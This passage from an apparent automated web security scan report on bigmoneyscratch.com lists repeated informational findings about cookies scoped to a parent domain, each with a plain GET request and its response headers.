X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=f5jure3lb3c4ja5502em2o55; path=/; HttpOnly
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:41:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: UniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Vary: Accept-Encoding
Content-Length: 47633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.80. http://www.bigmoneyscratch.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.81. http://www.bigmoneyscratch.com/Affiliates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Affiliates.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46288


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.82. http://www.bigmoneyscratch.com/ContactUsChat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.83. http://www.bigmoneyscratch.com/ContactUsFax.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.84. http://www.bigmoneyscratch.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.85. http://www.bigmoneyscratch.com/ContactUsTel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.86. http://www.bigmoneyscratch.com/FAQ.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FAQ.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95018


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.87. http://www.bigmoneyscratch.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.88. http://www.bigmoneyscratch.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47183


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.89. http://www.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.90. http://www.bigmoneyscratch.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.91. http://www.bigmoneyscratch.com/Mobile.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Mobile.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.92. http://www.bigmoneyscratch.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
